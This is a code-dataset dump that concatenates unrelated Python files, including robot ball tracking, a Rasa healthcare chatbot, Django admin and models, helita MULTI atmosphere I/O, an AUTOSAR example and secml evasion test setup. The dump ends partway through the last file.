id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3420335 | import threading
import numpy as np
import cv2
from mobot.brain.agent import Agent
from mobot.utils.image_grid import ImageGrid
from mobot.utils.rate import Rate
class BallFollower(Agent):
def __init__(self):
Agent.__init__(self)
self.camera.register_callback(self.camera_cb)
self.chassis.enable()
self.control_thread = threading.Thread(target=self.control_thread)
self.image_grid = ImageGrid(self, size=(1,3))
self.ball = None
self.width = None
def on_start(self):
self.control_thread.start()
def control_thread(self):
rate = Rate(20)
while self.ok():
if self.ball is not None:
center = self.width // 2
x,y,r = self.ball
target_r = 50
lateral_error = center - x
longitudinal_error = target_r - r
self.logger.info(f"lateral_error: {lateral_error}, longitudinal_error: {longitudinal_error}")
w = self.lateral_policy(lateral_error)
v = self.longitudinal_policy(longitudinal_error)
self.chassis.set_cmdvel(v=v, w=w)
else:
self.chassis.set_cmdvel(v=0.0, w=0.0)
rate.sleep()
def lateral_policy(self, lateral_error):
if lateral_error > 100:
w = 0.5
elif lateral_error < -100:
w = -0.5
else:
w = 0
return w
def longitudinal_policy(self, longitudinal_error):
if longitudinal_error > 20:
v = 0.06
elif longitudinal_error < -20:
v = -0.06
else:
v = 0
return v
def camera_cb(self, image, metadata):
self.width = metadata.width
self.image_grid.new_image(image, index=(0,0))
marked_image, seg_image, self.ball = self.segment_ball(np.flip(image, axis=-1))
self.image_grid.new_image(np.flip(seg_image, axis=-1), index=(0,1))
self.image_grid.new_image(np.flip(marked_image, axis=-1), index=(0,2))
def segment_ball(self, image):
marked_image = image.copy()
lower_yellow = np.array([14, 82, 160])
upper_yellow = np.array([56, 255, 255])
hsv_image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv_image, lower_yellow, upper_yellow)
mask = cv2.erode(mask, None, iterations=2)
mask = cv2.dilate(mask, None, iterations=2)
seg_image = cv2.bitwise_and(image, image, mask=mask)
gray_image = cv2.cvtColor(seg_image, cv2.COLOR_BGR2GRAY)
ball = cv2.HoughCircles(gray_image, cv2.HOUGH_GRADIENT,\
3, 1000,\
minRadius = 20,\
maxRadius = 150,\
param1 = 50,\
param2 = 30)
if ball is not None:
ball = np.round(ball.squeeze()).astype("int")
x, y, r = ball
cv2.circle(marked_image, (x, y), r, (0, 255, 0), 4)
return marked_image, seg_image, ball
if __name__ == "__main__":
ball_follower = BallFollower()
ball_follower.start()
| StarcoderdataPython |
3490597 | <reponame>sahilkumar15/ChatBots<gh_stars>100-1000
from rasa_sdk import Tracker
from rasa_sdk.executor import CollectingDispatcher
from typing import Dict, Text, Any, List
import requests
from rasa_sdk import Action
from rasa_sdk.events import SlotSet, FollowupAction
from rasa_sdk.forms import FormAction
# We use the medicare.gov database to find information about 3 different
# healthcare facility types, given a city name, zip code or facility ID
# the identifiers for each facility type is given by the medicare database
# xubh-q36u is for hospitals
# b27b-2uc7 is for nursing homes
# 9wzi-peqs is for home health agencies
ENDPOINTS = {
"base": "https://data.medicare.gov/resource/{}.json",
"xubh-q36u": {
"city_query": "?city={}",
"zip_code_query": "?zip_code={}",
"id_query": "?provider_id={}"
},
"b27b-2uc7": {
"city_query": "?provider_city={}",
"zip_code_query": "?provider_zip_code={}",
"id_query": "?federal_provider_number={}"
},
"9wzi-peqs": {
"city_query": "?city={}",
"zip_code_query": "?zip={}",
"id_query": "?provider_number={}"
}
}
FACILITY_TYPES = {
"hospital":
{
"name": "hospital",
"resource": "xubh-q36u"
},
"nursing_home":
{
"name": "nursing home",
"resource": "b27b-2uc7"
},
"home_health":
{
"name": "home health agency",
"resource": "9wzi-peqs"
}
}
def _create_path(base: Text, resource: Text,
query: Text, values: Text) -> Text:
"""Creates a path to find provider using the endpoints."""
if isinstance(values, list):
return (base + query).format(
resource, ', '.join('"{0}"'.format(w) for w in values))
else:
return (base + query).format(resource, values)
def _find_facilities(location: Text, resource: Text) -> List[Dict]:
"""Returns json of facilities matching the search criteria."""
if str.isdigit(location):
full_path = _create_path(ENDPOINTS["base"], resource,
ENDPOINTS[resource]["zip_code_query"],
location)
else:
full_path = _create_path(ENDPOINTS["base"], resource,
ENDPOINTS[resource]["city_query"],
location.upper())
#print("Full path:")
#print(full_path)
results = requests.get(full_path).json()
return results
def _resolve_name(facility_types, resource) ->Text:
for key, value in facility_types.items():
if value.get("resource") == resource:
return value.get("name")
return ""
class FindFacilityTypes(Action):
"""This action class allows to display buttons for each facility type
for the user to chose from to fill the facility_type entity slot."""
def name(self) -> Text:
"""Unique identifier of the action"""
return "find_facility_types"
def run(self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List:
buttons = []
for t in FACILITY_TYPES:
facility_type = FACILITY_TYPES[t]
payload = "/inform{\"facility_type\": \"" + facility_type.get(
"resource") + "\"}"
buttons.append(
{"title": "{}".format(facility_type.get("name").title()),
"payload": payload})
# TODO: update rasa core version for configurable `button_type`
dispatcher.utter_button_template("utter_greet", buttons, tracker)
return []
class FindHealthCareAddress(Action):
"""This action class retrieves the address of the user's
healthcare facility choice to display it to the user."""
def name(self) -> Text:
"""Unique identifier of the action"""
return "find_healthcare_address"
def run(self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]) -> List[Dict]:
facility_type = tracker.get_slot("facility_type")
healthcare_id = tracker.get_slot("facility_id")
full_path = _create_path(ENDPOINTS["base"], facility_type,
ENDPOINTS[facility_type]["id_query"],
healthcare_id)
results = requests.get(full_path).json()
if results:
selected = results[0]
if facility_type == FACILITY_TYPES["hospital"]["resource"]:
address = "{}, {}, {} {}".format(selected["address"].title(),
selected["city"].title(),
selected["state"].upper(),
selected["zip_code"].title())
elif facility_type == FACILITY_TYPES["nursing_home"]["resource"]:
address = "{}, {}, {} {}".format(selected["provider_address"].title(),
selected["provider_city"].title(),
selected["provider_state"].upper(),
selected["provider_zip_code"].title())
else:
address = "{}, {}, {} {}".format(selected["address"].title(),
selected["city"].title(),
selected["state"].upper(),
selected["zip"].title())
return [SlotSet("facility_address", address)]
else:
print("No address found. Most likely this action was executed "
"before the user choose a healthcare facility from the "
"provided list. "
"If this is a common problem in your dialogue flow,"
"using a form instead for this action might be appropriate.")
return [SlotSet("facility_address", "not found")]
class FacilityForm(FormAction):
"""Custom form action to fill all slots required to find specific type
of healthcare facilities in a certain city or zip code."""
def name(self) -> Text:
"""Unique identifier of the form"""
return "facility_form"
@staticmethod
def required_slots(tracker: Tracker) -> List[Text]:
"""A list of required slots that the form has to fill"""
return ["facility_type", "location"]
def slot_mappings(self) -> Dict[Text, Any]:
return {"facility_type": self.from_entity(entity="facility_type",
intent=["inform",
"search_provider"]),
"location": self.from_entity(entity="location",
intent=["inform",
"search_provider"])}
def submit(self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any]
) -> List[Dict]:
"""Once required slots are filled, print buttons for found facilities"""
location = tracker.get_slot('location')
facility_type = tracker.get_slot('facility_type')
results = _find_facilities(location, facility_type)
button_name = _resolve_name(FACILITY_TYPES, facility_type)
if len(results) == 0:
dispatcher.utter_message(
"Sorry, we could not find a {} in {}.".format(button_name,
location.title()))
return []
buttons = []
# limit number of results to 3 for clear presentation purposes
for r in results[:3]:
if facility_type == FACILITY_TYPES["hospital"]["resource"]:
facility_id = r.get("provider_id")
name = r["hospital_name"]
elif facility_type == FACILITY_TYPES["nursing_home"]["resource"]:
facility_id = r["federal_provider_number"]
name = r["provider_name"]
else:
facility_id = r["provider_number"]
name = r["provider_name"]
payload = "/inform{\"facility_id\":\"" + facility_id + "\"}"
buttons.append(
{"title": "{}".format(name.title()), "payload": payload})
if len(buttons) == 1:
message = "Here is a {} near you:".format(button_name)
else:
if button_name == "home health agency":
button_name = "home health agencie"
message = "Here are {} {}s near you:".format(len(buttons),
button_name)
# TODO: update rasa core version for configurable `button_type`
dispatcher.utter_button_message(message, buttons)
return []
| StarcoderdataPython |
4859166 | from typing import Dict, Union, Set
from unittest import TestCase
from networkx import DiGraph
from veniq.baselines.semi._common_types import Statement, StatementSemantic
from veniq.baselines.semi._lcom2 import LCOM2
from veniq.ast_framework import ASTNode
class LCOM2TestCase(TestCase):
def test_same_semantic(self):
statements_semantic = self._create_statements_semantic("x", "x", "x", "x")
self.assertEqual(LCOM2(statements_semantic), 0)
def test_different_semantic(self):
statements_semantic = self._create_statements_semantic("x", "y", "z", "a")
self.assertEqual(LCOM2(statements_semantic), 6)
def test_equal_pairs_quantity(self):
statements_semantic = self._create_statements_semantic("x", {"x", "y"}, {"x", "z"}, {"x", "a"})
self.assertEqual(LCOM2(statements_semantic), 0)
@staticmethod
def _create_statements_semantic(
*used_object_name: Union[str, Set[str]]
) -> Dict[Statement, StatementSemantic]:
graph = DiGraph()
return {
ASTNode(graph, id): StatementSemantic(
used_objects=object_name if isinstance(object_name, set) else {object_name}
)
for id, object_name in enumerate(used_object_name)
}
| StarcoderdataPython |
5019166 | <reponame>pylangstudy/201706
while True:
try:
x = int(input("Please enter a number: "))
break
except KeyboardInterrupt:
print("KeyboardInterrupt!!")
except ValueError:
print("Oops! That was no valid number. Try again")
| StarcoderdataPython |
4926483 | <reponame>M1kol4j/helita
"""
Set of routines to interface with MULTI (1D or _3D)
"""
import numpy as np
import os
class Multi_3dOut:
def __init__(self, outfile=None, basedir='.', atmosid='', length=4,
verbose=False, readall=False):
""" Class that reads and deals with output from multi_3d """
self.verbose = verbose
out3dfiles = ['cmass3d', 'dscal2', 'height3d', 'Iv3d', 'taulg3d',
'x3d', 'xnorm3d']
c3dfiles = ['n3d', 'b3d']
if outfile is None:
outfile = '%s/out3d.%s' % (basedir, atmosid)
else:
basedir = os.path.split(outfile)[0]
atmosid = os.path.split(mm)[1].split('out3d.')[1]
out3dfiles = ['%s/%s.%s' % (basedir, s, atmosid) for s in out3dfiles]
c3dfiles = ['%s/%s.%s' % (basedir, s, atmosid) for s in c3dfiles]
self.read_out3d(outfile, length=length)
# read all output files
if readall:
for f in out3dfiles:
if os.path.isfile(f):
self.read_out3d(f, length=length)
for f in c3dfiles:
if os.path.isfile(f):
self.read_c3d(f, length=length,
mode=(os.path.split(f)[1].split('.' +
atmosid)[0]))
return
def check_basic(self):
"""
Checks to see if basic input parameters have been read from out3d.
"""
basic = ['nx', 'ny', 'ndep', 'mq', 'nrad', 'nqtot']
for p in basic:
if p not in dir(self):
raise ValueError('(EEE) %s has not been read. Make sure '
'out3d was read.' % p)
return
def read_out3d(self, outfile, length=4):
""" Reads out3d file. """
from ..io.fio import fort_read
# find out endianness
test = np.fromfile(outfile, dtype='<i', count=1)[0]
be = False if test == 16 else True
file = open(outfile, 'r')
readon = True
arrays_xyz = ['taulg3d', 'cmass3d', 'dscal2', 'xnorm3d', 'x3d',
'height3d']
while readon:
try:
itype, isize, cname = fort_read(file, 0, ['i', 'i', '8c'],
big_endian=be, length=length)
cname = cname.strip()
if self.verbose:
print(('--- reading ' + cname))
if cname == 'id':
self.id = fort_read(file, 0, ['80c'])[0].strip()
elif cname == 'dim':
aa = fort_read(file, isize, 'i', big_endian=be,
length=length)
self.nx, self.ny, self.ndep, self.mq, self.nrad = aa[:5]
if isize == 5:
self.version = 1
else:
self.version = 2
self.nq = aa[5:]
self.nqtot = np.sum(self.nq) + self.nrad
self.nxyz = self.nx * self.ny * self.ndep
elif cname == 'q':
self.check_basic()
aa = fort_read(file, self.mq * self.nrad, 'f',
big_endian=be, length=length)
self.q = np.transpose(aa.reshape(self.nrad, self.mq))
elif cname == 'xl':
self.check_basic()
self.xl = fort_read(file, self.nqtot, 'd', big_endian=be,
length=length)
elif cname in arrays_xyz:
self.check_basic()
aa = fort_read(file, self.nxyz, 'f', big_endian=be,
length=length)
setattr(self, cname,
np.transpose(aa.reshape(self.ndep, self.ny,
self.nx)))
elif cname == 'Iv':
self.check_basic()
aa = fort_read(file, isize, 'f', big_endian=be,
length=length)
self.Iv = np.transpose(aa.reshape(self.ny, self.nx,
self.nqtot))
elif cname == 'n3d': # might be brokenp...
self.check_basic()
self.nk = isize // (self.nx * self.ny * self.ndep)
aa = fort_read(file, isize, 'f', big_endian=be,
length=length)
self.n3d = np.transpose(aa.reshape(self.nk, self.ndep,
self.ny, self.nx))
elif cname == 'nk':
self.nk = fort_read(file, 1, 'i', big_endian=be,
length=length)[0]
else:
print(('(WWW) read_out3d: unknown label found: %s. '
'Aborting.' % cname))
break
except EOFError:
readon = False
if self.verbose:
print(('--- Read %s.' % outfile))
return
def read_c3d(self, outfile, length=4, mode='n3d'):
''' Reads the 3D cube output file, like n3d or b3d. '''
self.check_basic()
self.nk = os.path.getsize(outfile) // (self.nxyz * 4)
setattr(self, mode, np.memmap(outfile, dtype='Float32', mode='r',
order='F', shape=(self.nx, self.ny,
self.ndep, self.nk)))
if self.verbose:
print('--- Read ' + outfile)
return
class Atmos3d:
def __init__(self, infile, big_endian=False):
''' Reads multi_3d/old multi3d atmos3d file '''
self.big_endian = big_endian
self.read(infile, big_endian=big_endian)
return
def read(self, infile, big_endian, length=4):
from ..io.fio import fort_read
file = open(infile, 'r')
types = {4: 'f', 5: 'd'} # precision, float or double
# read header stuff
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
nx, ny, nz = fort_read(file, 3, 'i', big_endian=big_endian,
length=length)
self.nx = nx
self.ny = ny
self.nz = nz
# x [cm]
itype, isize, lx1, lx2 = fort_read(file, 4, 'i', big_endian=big_endian,
length=length)
prec = types[itype]
self.x = fort_read(file, nx, prec, big_endian=big_endian,
length=length)
# y [cm]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
self.y = fort_read(file, ny, prec, big_endian=big_endian,
length=length)
# z [cm]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
self.z = fort_read(file, nz, prec, big_endian=big_endian,
length=length)
# electron density [cm-3]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.ne = np.transpose(aa.reshape((nz, ny, nx)))
# temperature [K]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.temp = np.transpose(aa.reshape((nz, ny, nx)))
# vx [km/s]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.vx = np.transpose(aa.reshape((nz, ny, nx)))
# vy [km/s]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.vy = np.transpose(aa.reshape((nz, ny, nx)))
# vz [km/s]
fort_read(file, 16, 'b', big_endian=big_endian, length=length)
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.vz = np.transpose(aa.reshape((nz, ny, nx)))
# reading rho, if written to file
last = fort_read(file, 16, 'b', big_endian=big_endian, length=length)
if len(last) != 0:
# rho [g cm-3]
aa = fort_read(file, nx * ny * nz, prec, big_endian=big_endian,
length=length)
self.rho = np.transpose(aa.reshape((nz, ny, nx)))
file.close()
return
def write_rh15d(self, outfile, sx=None, sy=None, sz=None, desc=None):
''' Writes atmos into rh15d NetCDF format. '''
from . import rh15d
if not hasattr(self, 'rho'):
raise UnboundLocalError('(EEE) write_rh15d: present atmosphere has'
'no rho, cannot convert to rh15d format')
# slicing and unit conversion
if sx is None:
sx = [0, self.nx, 1]
if sy is None:
sy = [0, self.ny, 1]
if sz is None:
sz = [0, self.nz, 1]
temp = self.temp[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
sz[0]:sz[1]:sz[2]]
rho = self.rho[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2], sz[0]:sz[1]:sz[2]]
ne = self.ne[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
sz[0]:sz[1]:sz[2]] * 1.e6
vz = self.vz[sx[0]:sx[1]:sx[2], sy[0]:sy[1]:sy[2],
sz[0]:sz[1]:sz[2]] * 1.e3
z = self.z[sz[0]:sz[1]:sz[2]] * 1e-2
nh = rho / 2.380491e-24 * 1.e6 # from rho to nH in m^-3
# write to file
rh15d.make_ncdf_atmos(outfile, temp, vz, ne, nh, z, append=False,
desc=desc, snap=0)
return
def watmos_multi(filename, temp, ne, z=None, logtau=None, vz=None, vturb=None,
cmass=None, nh=None, id='Model', scale='height', logg=4.44,
write_dscale=False, spherical=False, radius=6.96e5):
"""
Writes atmosphere in MULTI format, either HEIGHT scale or TAU(5000) scale.
Does NOT write dscale file.
The following units must be used:
* Temp [K]
* ne [cm^-3]
* nh [cm^-3]
* vz [km/s]
* vturb [km/s]
* z [km]
* cmass [gm cm^-2] (optional)
--Tiago, 20101118
"""
if scale.lower() == 'height':
if z is None:
raise ValueError('watmos_multi: height scale selected '
'but z not given!')
scl = z
desc = 'HEIGHT (KM)'
elif scale.lower() == 'tau':
if not logtau:
raise ValueError('watmos_multi: tau scale selected but '
'tau not given!')
scl = logtau
desc = 'LG TAU(5000)'
elif scale.lower() == 'mass':
if cmass is None:
raise ValueError('watmos_multi: mass scale selected but '
'column mass not given!')
scl = cmass
desc = 'LOG COLUMN MASS'
f = open(filename, 'w')
ndep = len(temp)
# write 'header'
f.write(' {0}\n*\n'.format(id))
f.write(' {0} scale\n'.format(scale).upper())
f.write('* LG G\n')
f.write('{0:6.2f}\n'.format(logg))
if spherical:
f.write('* Nradius Ncore Ninter\n')
f.write('{0:5d} 8 0\n'.format(ndep))
else:
f.write('* NDEP\n')
f.write('{0:5d}\n'.format(ndep))
f.write('* {0} TEMPERATURE NE V '
'VTURB\n'.format(desc))
if vz is None:
vz = np.zeros(ndep, dtype='f')
if not vturb:
vturb = np.zeros(ndep, dtype='f')
elif type(vturb) == type(5): # constant vturb
vturb = np.zeros(ndep, dtype='f') + vturb
# write atmosphere
for i in range(ndep):
# astype hack to get over numpy bug
f.write('{0:15.6E}{1:15.6E}{2:15.6E}{3:15.6E}{4:15.6E}'
'\n'.format(scl[i].astype('d'), temp[i].astype('d'),
ne[i].astype('d'), vz[i].astype('d'),
vturb[i].astype('d')))
# if nh given
if nh is not None:
if nh.shape != (6, ndep):
raise ValueError('watmos_multi: nh has incorrect shape. Must be '
'6 H levels!')
f.write('*\n* Hydrogen populations\n')
f.write('* nh(1) nh(2) nh(3) nh(4) nh(5) '
'np\n')
for i in range(ndep):
ss = ''
for j in range(nh.shape[0]):
ss += '{0:12.4E}'.format(nh[j, i].astype('d'))
f.write(ss + '\n')
f.close()
print('--- Wrote multi atmosphere to ' + filename)
if write_dscale:
f = open(filename + '.dscale', 'w')
f.write(' {0}\n*\n'.format(id))
f.write(' {0} scale\n'.format(scale).upper())
# setting the second element to zero will force it to be calculated
# in DPCONV. Will it work for height scale?
f.write('{0:5d} {1:.5f}\n'.format(ndep, 0.))
for i in range(ndep):
f.write('{0:15.6E}\n'.format(scl[i].astype('d')))
f.close()
print(('--- Wrote dscale to ' + filename + '.dscale'))
return
def write_atmos3d(outfile, x, y, z, ne, temp, vz, vx=None, vy=None, rho=None,
big_endian=False, length=4, prec='Float32'):
"""
Writes atmos3d atmosphere (format of 'old' multi3d and multi_3d).
vx and vy are optional, if not specified zeros will be used. rho is
also optional, if not specified it will not be written at the end of the
file.
Input 3D arrays (ne, temp, vx, vy, vz, rho) must be in C order!
(shape = [nx, ny, nz]) They will be written in Fortran order
(shape=[nz,ny,nx])
IN:
x, y, z [cm]: 1D arrays
ne [cm-3]: 3D array
temp [K]: 3D array
vz [km/s]: 3D array
vx, vy [km/s]: 3D arrays, optional
rho [g cm-3]: 3D array, optional
big_endian: Boolean, if true will write in big endian
length: length of fortran format pad. Should be 4 in most cases.
prec: precision (Float32 or Float64)
"""
import os
from ..io.fio import fort_write
if os.path.isfile(outfile):
raise IOError('(EEE) write_atmos3d: file %s already exists, refusing '
'to overwrite.' % outfile)
f = open(outfile, 'w')
# Tiago note: these should be fortran longs. However, in 64-bit systems the
# size of a long in python is 8 bytes, where fortran longs are
# still 4 bytes. Hence, it is better to keep all longs as ints,
# as sizeof(int) = 4
nx = len(x)
ny = len(y)
nz = len(z)
ii = 3
ir = 5 if prec in ['Float64', 'd'] else 4
ll = length
be = big_endian
if vx is None:
vx = np.zeros(vz.shape, dtype=prec)
if vy is None:
vy = np.zeros(vz.shape, dtype=prec)
fort_write(f, 0, [ii, 3, 'dim '], big_endian=be, length=ll)
fort_write(f, 0, [nx, ny, nz], big_endian=be, length=ll)
fort_write(f, 0, [ir, nx, 'x grid '], big_endian=be, length=ll)
fort_write(f, x.size, x.astype(prec), big_endian=be, length=ll)
fort_write(f, 0, [ir, nx, 'y grid '], big_endian=be, length=ll)
fort_write(f, y.size, y.astype(prec), big_endian=be, length=ll)
fort_write(f, 0, [ir, nx, 'z grid '], big_endian=be, length=ll)
fort_write(f, z.size, z.astype(prec), big_endian=be, length=ll)
fort_write(f, 0, [ir, nx, 'nne '], big_endian=be, length=ll)
fort_write(f, ne.size, np.transpose(ne).astype(prec), big_endian=be,
length=ll)
fort_write(f, 0, [ir, nx, 'temp '], big_endian=be, length=ll)
fort_write(f, temp.size, np.transpose(temp).astype(prec), big_endian=be,
length=ll)
fort_write(f, 0, [ir, nx, 'vel x '], big_endian=be, length=ll)
fort_write(f, vx.size, np.transpose(vx).astype(prec), big_endian=be,
length=ll)
fort_write(f, 0, [ir, nx, 'vel y '], big_endian=be, length=ll)
fort_write(f, vy.size, np.transpose(vy).astype(prec), big_endian=be,
length=ll)
fort_write(f, 0, [ir, nx, 'vel z '], big_endian=be, length=ll)
fort_write(f, vz.size, np.transpose(vz).astype(prec), big_endian=be,
length=ll)
if rho is not None:
fort_write(f, 0, [ir, nx, 'rho '], big_endian=be, length=ll)
fort_write(f, rho.size, np.transpose(rho).astype(prec), big_endian=be,
length=ll)
f.close()
print(('Wrote %s' % outfile))
return
| StarcoderdataPython |
6551119 | """\
wxCheckBox widget configuration
@copyright: 2014-2016 <NAME>
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
config = {
'wxklass': 'wxCheckBox',
'style_defs': {
'wxCHK_2STATE': {
'desc': _('Create a 2-state checkbox. This is the default.'),
'exclude': 'wxCHK_3STATE',
},
'wxCHK_3STATE': {
'desc': _('Create a 3-state checkbox. Not implemented in wxOS2 '
'and wxGTK built against GTK+ 1.2.'),
'exclude': 'wxCHK_2STATE',
},
'wxCHK_ALLOW_3RD_STATE_FOR_USER': {
'desc': _("By default a user can't set a 3-state checkbox to the "
"third state. It can only be done from code. Using "
"this flags allows the user to set the checkbox to "
"the third state by clicking."),
'require': 'wxCHK_3STATE',
},
'wxALIGN_RIGHT': {
'desc': _('Makes the text appear on the left of the checkbox.')
}
},
'style_list': ['wxCHK_2STATE', 'wxCHK_3STATE',
'wxCHK_ALLOW_3RD_STATE_FOR_USER', 'wxALIGN_RIGHT'],
# mapping for selected values to checkbox states (wxCheckBoxState)
'number2state': {
0: 'wxCHK_UNCHECKED',
1: 'wxCHK_CHECKED',
2: 'wxCHK_UNDETERMINED',
},
'events': {
'EVT_CHECKBOX': {},
},
}
| StarcoderdataPython |
9754497 | from django.db import models
# local imports
from authors.apps.authentication.models import User
from authors.apps.articles.models import Article
class BookmarkArticle(models.Model):
"""
Create the bookmark model
"""
user = models.ForeignKey(User, verbose_name='User', on_delete=models.CASCADE)
article = models.ForeignKey(Article, related_name='bookmark_url', verbose_name='Article', on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
objects = models.Manager()
class Meta:
unique_together = (('user', 'article'),)
ordering = ['-created_at']
def __str__(self):
"""
Nice string of user and bookmarked article
"""
return "{} bookmarked by user {}".format(self.article, self.user)
| StarcoderdataPython |
5051001 | <filename>ethfinex/__init__.py
name = "ethfniex"
| StarcoderdataPython |
6485117 | <reponame>judaicalink/judaicalink-labs
from django.contrib import admin
from django.contrib.admin import AdminSite
import django.db.models as django_models
from . import views
from . import models
# Register your models here.
class MyAdminSite(AdminSite):
site_header = 'JudaicaLink Labs Backend'
def get_urls(self):
from django.conf.urls import url
urls = super(MyAdminSite, self).get_urls()
# Note that custom urls get pushed to the list (not appended)
# This doesn't work with urls += ...
urls = [
url(r'^load_from_github/$', self.admin_view(views.load_from_github), name='load_from_github'),
url(r'^load_elasticsearch/$', self.admin_view(views.load_elasticsearch), name='load_elasticsearch'),
url(r'^load_fuseki/$', self.admin_view(views.load_fuseki), name='load_fuseki'),
url(r'^backend/serverstatus/$', self.admin_view(views.serverstatus), name='serverstatus'),
] + urls
return urls
admin_site = MyAdminSite(name='admin')
class ThreadTaskAdmin(admin.ModelAdmin):
list_display = ['name', 'started', 'ended', 'is_done', 'status_ok', 'last_log']
list_display_links = ['name']
list_filter = ['is_done', 'name']
admin_site.register(models.ThreadTask, ThreadTaskAdmin)
| StarcoderdataPython |
352085 | # -*- coding: utf-8 -*-
"""
tkfilebrowser - Alternative to filedialog for Tkinter
Copyright 2017 <NAME> <<EMAIL>>
based on code by <NAME> copyright 1998
<http://effbot.org/zone/tkinter-autoscrollbar.htm>
tkfilebrowser is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
tkfilebrowser is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Scrollbar that hides automatically when not needed
"""
from tkfilebrowser.constants import tk, ttk
class AutoScrollbar(ttk.Scrollbar):
"""Scrollbar that hides itself if it's not needed."""
def set(self, lo, hi):
if float(lo) <= 0.0 and float(hi) >= 1.0:
self.grid_remove()
else:
self.grid()
ttk.Scrollbar.set(self, lo, hi)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
| StarcoderdataPython |
1781141 | <gh_stars>100-1000
import autosar
def setup():
ws = autosar.workspace(version="4.2.2")
package=ws.createPackage('ApplicationTypes', role='DataType')
package.createSubPackage('DataConstrs', role='DataConstraint')
package.createSubPackage('CompuMethods', role='CompuMethod')
package.createSubPackage('Units', role='Unit')
return ws
ws = setup()
compuMethodPackage = ws.findRolePackage('CompuMethod')
speedCompuMethod = compuMethodPackage.createCompuMethodRational('VehicleSpeed_CompuMethod',
scaling=1/64, offset=0, unit="Km_per_h", forceFloat=True)
dataConstraintPackage = ws.findRolePackage('DataConstraint')
speedDataConstraint = dataConstraintPackage.createInternalDataConstraint('VehicleSpeed_DataConstraint', 0, 65535)
dataTypePackage = ws.findRolePackage('DataType')
dataTypePackage.createApplicationPrimitiveDataType('VehicleSpeed_T',
dataConstraint = speedDataConstraint.ref, compuMethod=speedCompuMethod.ref)
ws.saveXML('DataTypes.arxml', filters=['/ApplicationTypes'])
| StarcoderdataPython |
3362717 | <gh_stars>1-10
from pydantic import create_model, validator
def create_model_for_table(tablename, cols):
def validate_length(cls, v, values, **kwargs):
col_value = v
col_length = lengths[kwargs["field"].name]
assert col_length >= len(f"{col_value}")
return col_value
lengths = {}
validators = {}
fields = {}
for key, value in cols.items():
lengths[key] = value[1]
validators[f"{key}_validator"] = validator(key, allow_reuse=True)(validate_length)
if value[0] == "int":
fields[key] = (int, ...)
if value[0] == "str":
fields[key] = (str, ...)
table = create_model(
tablename,
**fields,
__validators__=validators
)
return table
| StarcoderdataPython |
4917897 | from secml.testing import CUnitTest
from numpy import *
from secml.data.loader import CDLRandomBlobs
from secml.optim.constraints import \
CConstraintBox, CConstraintL1, CConstraintL2
from secml.ml.features.normalization import CNormalizerMinMax
from secml.ml.classifiers import CClassifierSVM, CClassifierDecisionTree
from secml.core.type_utils import is_list, is_float
from secml.figure import CFigure
from secml.utils import fm
IMAGES_FOLDER = fm.join(fm.abspath(__file__), 'test_images')
if not fm.folder_exist(IMAGES_FOLDER):
fm.make_folder(IMAGES_FOLDER)
class CAttackEvasionTestCases(CUnitTest):
"""Unittests interface for CAttackEvasion."""
images_folder = IMAGES_FOLDER
make_figures = False # Set as True to produce figures
def _load_blobs(self, n_feats, n_clusters, sparse=False, seed=None):
"""Load Random Blobs dataset.
- n_samples = 50
- center_box = (-0.5, 0.5)
- cluster_std = 0.5
Parameters
----------
n_feats : int
n_clusters : int
sparse : bool, optional (default False)
seed : int or None, optional (default None)
"""
loader = CDLRandomBlobs(
n_samples=50,
n_features=n_feats,
centers=n_clusters,
center_box=(-0.5, 0.5),
cluster_std=0.5,
random_state=seed)
self.logger.info(
"Loading `random_blobs` with seed: {:}".format(seed))
ds = loader.load()
if sparse is True:
ds = ds.tosparse()
return ds
@staticmethod
def _discretize_data(ds, eta):
"""Discretize data of input dataset based on eta.
Parameters
----------
ds : CDataset
eta : eta or scalar
"""
if is_list(eta):
if len(eta) != ds.n_features:
raise ValueError('len(eta) != n_features')
for i in range(len(eta)):
ds.X[:, i] = (ds.X[:, i] / eta[i]).round() * eta[i]
else: # eta is a single value
ds.X = (ds.X / eta).round() * eta
return ds
def _prepare_linear_svm(self, sparse, seed):
"""Preparare the data required for attacking a LINEAR SVM.
- load a blob 2D dataset
- create a SVM (C=1) and a minmax preprocessor
Parameters
----------
sparse : bool
seed : int or None
Returns
-------
ds : CDataset
clf : CClassifierSVM
"""
ds = self._load_blobs(
n_feats=2, # Number of dataset features
n_clusters=2, # Number of dataset clusters
sparse=sparse,
seed=seed
)
normalizer = CNormalizerMinMax(feature_range=(-1, 1))
clf = CClassifierSVM(C=1.0, preprocess=normalizer)
return ds, clf
def _prepare_nonlinear_svm(self, sparse, seed):
